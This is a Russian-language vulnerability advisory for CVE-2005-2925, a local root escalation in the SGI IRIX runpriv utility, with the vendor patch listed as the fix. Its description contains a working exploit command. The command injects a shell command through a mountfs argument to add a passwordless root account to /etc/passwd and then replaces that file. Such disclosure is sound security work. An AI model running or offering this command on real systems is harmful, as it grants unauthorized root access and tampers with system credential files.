Повышение привилегий в SGI IRIX в утилите runpriv'

Дата публикации:	14.10.2005
Всего просмотров:	1150
Опасность:	Низкая
Наличие исправления:	Да
Количество уязвимостей:	1
CVE ID:	CVE-2005-2925
Вектор эксплуатации:	Локальная
Воздействие:	Повышение привилегий Обход ограничений безопасности
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	SGI IRIX 6.5.x
	Уязвимые версии: SGI IRIX 6.5.22, 6.5.27 и 6.5.28 Описание: Уязвимость в утилите runpriv позволяет локальному пользователю повысить свои привилегии на системе. Уязвимость существует в утилите runpriv из-за небезопасного выполнения команд после проверки привилегий пользователя. Локальный пользователь с правами на запуск приложений из директории /usr/sysadm/privbin, может выполнить произвольные команды на системе с привилегиями пользователя root. Пример для пользователя с правами на запуск утилиты mountfs: /usr/sysadm/bin/runpriv mountfs -s test -d / -o \\| "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'" su r00t -c "chown root:sys /tmp/passwd123 ; mv /tmp/passwd123 /etc/passwd ; chmod 644 /etc/passwd ; su" URL производителя: www.sgi.com Решение: Установите исправление 7004 с сайта производителя. Источник:
Ссылки:	SGI IRIX runpriv Design Error Vulnerability

Повышение привилегий в SGI IRIX в утилите runpriv'

Подпишитесь на email рассылку